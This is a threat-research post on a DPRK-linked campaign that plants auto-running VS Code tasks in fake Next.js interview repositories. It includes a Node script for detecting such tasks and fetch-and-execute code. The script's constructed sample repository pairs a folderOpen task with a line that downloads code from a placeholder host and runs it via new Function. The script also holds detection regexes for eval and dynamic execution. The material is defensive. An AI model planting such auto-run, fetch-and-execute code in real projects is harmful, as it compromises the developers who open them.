new Function(), New Threat: Inside a Live DPRK Developer-Targeting Campaign | Intercept Cell
We acquired live malware source code from a DPRK-linked campaign targeting software developers through trojanized Next.js repositories disguised as job interview coding assessments. Two C2 servers remain operational. The remote code execution mechanism hides in plain sight: new Function(
Two days after we published our analysis of a trojanized CUDA toolkit linked to DPRK threat actors, we found the same operational cluster has pivoted. The new vector: fake Next.js coding assessments sent to developers during job interviews. We pulled the actual malware loader source code off live staging infrastructure, confirmed two active command-and-control servers, and mapped the full attack chain. The campaign is still running.

Microsoft Defender published a report on February 24 identifying malicious repositories on Bitbucket posing as legitimate Next.js projects. We independently acquired artifacts from the live infrastructure and confirmed active C2 servers. Five Vercel-hosted staging domains remained live at time of analysis, including endpoints actively serving malware loader code to anyone who requested it.

The campaign uses recruiting-themed lures. A developer receives a repository framed as a technical assessment or interview project. The repo looks legitimate. It builds. It runs. It also phones home to Pyongyang.

The attackers embedded three independent execution triggers into each repository, ensuring infection regardless of how the developer interacts with the code:

A .vscode/tasks.json file configured with runOn: "folderOpen" executes a Node script the moment the developer opens the project folder in VS Code and clicks Trust. The script fetches a loader from a Vercel staging domain and executes it in memory.
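The following Node script is an added detection example, not the campaign's loader and not Intercept Cell's tooling. It flags both halves of the folderOpen trigger described above in a checked-out repository: a tasks.json entry whose runOptions.runOn is "folderOpen", and JavaScript that fetches remote content and hands it to new Function() or eval. The sample repository, its file names and the staging hostname are constructed for the example; the axios, got and vm.runIn* patterns are assumptions about how other loaders might be written, not indicators from this campaign.

```javascript
// Added detection example (constructed; not the campaign's code).
// tasks.json is JSON with comments (JSONC); strip comments without touching
// "//" inside string values such as URLs.
function stripJsonComments(text) {
  let out = '', inStr = false, i = 0;
  while (i < text.length) {
    const c = text[i], n = text[i + 1];
    if (inStr) {
      out += c;
      if (c === '\\') { out += n === undefined ? '' : n; i += 2; continue; }
      if (c === '"') inStr = false;
      i++;
    } else if (c === '"') { inStr = true; out += c; i++; }
    else if (c === '/' && n === '/') { while (i < text.length && text[i] !== '\n') i++; }
    else if (c === '/' && n === '*') { const e = text.indexOf('*/', i + 2); i = e < 0 ? text.length : e + 2; }
    else { out += c; i++; }
  }
  return out;
}

// Every task VS Code would start on its own once the folder is opened and trusted.
function findFolderOpenTasks(tasksJsonText) {
  const cfg = JSON.parse(stripJsonComments(tasksJsonText));
  return (cfg.tasks || [])
    .filter(t => t.runOptions && t.runOptions.runOn === 'folderOpen')
    .map(t => ({
      label: t.label || '(unlabeled)',
      command: [t.command, ...(t.args || [])].filter(Boolean).join(' '),
    }));
}

// Loader heuristic: something is fetched over the network AND something is
// executed from a string. Either alone is common in legitimate code; together
// in one file they are worth a human look.
const FETCH_RE = /\b(fetch|axios\.(get|post)|https?\.(get|request)|got)\s*\(/;
const EXEC_RE = /\b(?:new\s+)?Function\s*\(|\beval\s*\(|\bvm\.runIn\w+\s*\(/g;
const URL_RE = /https?:\/\/[^\s'"`]+/g;

function findRemoteCodeExecution(sourceText) {
  const execs = sourceText.match(EXEC_RE) || [];
  const urls = [...new Set(sourceText.match(URL_RE) || [])];
  return { fetchesRemote: FETCH_RE.test(sourceText), dynamicExec: execs.length, urls };
}

// files: { relativePath: fileContents }, e.g. built from a git checkout.
function scanRepo(files) {
  const findings = [];
  for (const [path, text] of Object.entries(files)) {
    if (path.endsWith('.vscode/tasks.json')) {
      for (const t of findFolderOpenTasks(text)) {
        findings.push({ path, kind: 'auto-run task', detail: `${t.label}: ${t.command}` });
      }
    } else if (/\.(c?js|mjs|ts)$/.test(path)) {
      const r = findRemoteCodeExecution(text);
      if (r.dynamicExec > 0 && r.fetchesRemote) {
        const urls = r.urls.length ? r.urls.join(', ') : 'no literal URL';
        findings.push({ path, kind: 'fetch-and-execute', detail: `${r.dynamicExec} dynamic exec call(s); ${urls}` });
      }
    }
  }
  return findings;
}

// Constructed sample repository modelled on the trigger described above.
// The hostname is a placeholder, not a real indicator.
const SAMPLE_REPO = {
  '.vscode/tasks.json': `{
  // constructed sample
  "version": "2.0.0",
  "tasks": [
    { "label": "install deps", "type": "shell", "command": "npm", "args": ["install"] },
    { "label": "prepare env", "type": "shell", "command": "node",
      "args": ["scripts/setup.js"], "runOptions": { "runOn": "folderOpen" } }
  ]
}`,
  'scripts/setup.js': `const https = require('https');
https.get('https://example-staging.vercel.app/loader.js', res => {
  let body = '';
  res.on('data', d => body += d);
  res.on('end', () => new Function(body)());   // in-memory execution of fetched code
});`,
  'lib/util.js': `module.exports = { add: (a, b) => a + b };`,
};

function report(files) {
  return scanRepo(files).map(f => `[${f.kind}] ${f.path}: ${f.detail}`);
}

for (const line of report(SAMPLE_REPO)) console.log(line);
```

Run it against a cloned interview repo before opening the folder in VS Code, because the trigger fires at the moment the workspace is marked trusted. If the tasks.json finding is present, do not click Trust; open the folder in Restricted Mode, read the task's command, and keep VS Code's task.allowAutomaticTasks setting off on machines used to review untrusted code. The fetch-and-execute heuristic is deliberately loose: a file that only calls fetch, or only calls new Function, is not flagged, so pair it with a manual review of whatever the auto-run task actually launches.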